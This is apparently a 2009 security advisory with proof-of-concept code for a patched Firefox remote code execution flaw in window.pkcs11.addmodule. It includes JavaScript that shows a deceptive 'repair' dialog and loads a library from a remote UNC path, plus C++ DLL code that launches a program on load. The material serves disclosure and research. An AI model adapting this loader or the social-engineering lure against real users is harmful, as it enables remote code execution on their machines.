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Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule
来源:vfocus.net 作者:Kaminsky 发布时间:2009-09-14  

Fix announce:   http://www.mozilla.org/security/announce/2009/mfsa2009-48.html
Bug history: https://bugzilla.mozilla.org/show_bug.cgi?id=326628

So, Firefox up through 3.0.13 had an obscure little function under window.pkcs11:

 long                      addmodule(in DOMString moduleName,
                                     in DOMString libraryFullPath,
                                     in long cryptoMechanismFlags,
                                     in long cipherFlags);

Yes, that's actually the full path to a DLL -- or an .so on Linux/OSX --
from a JS function that's exposed to the web.

Attacker doesn't get zero click install -- there's a dialog -- but:

1) Attacker does get to customize the dialog via moduleName
2) The dialog is modal, so the user doesn't get access to Firefox again
until they hit OK (can't even close Firefox)
3) On Windows, he can put a UNC path in for the Library path.  There's
probably similar on OSX and some Linux distros.  Even without, there's
usually a way to get a file in a known location -- see John Heasman's
Java work.

LoadLibrary of Attacker library on OK.



  var str = "Error detected in Firefox Module NSP31337.bin.\n" +
           "Please click 'OK' to repair."

     ret=window.pkcs11.addmodule("\n\n\n" + str + "\n\n\n", "\\\\\\c$\\
pkunkcs", 0, 0);


"Shellcode" is just a DLL with ShellExecute in the constructor:


    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;

    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));

    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);

    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);


Cheers to Jesse Ruderman, who recognized this was probably not the
greatest of API's some time ago.  The bug history is worth taking a look
at...goes back a while.  They missed the UNC path vector, and appear to
have underestimated the modal dialog.

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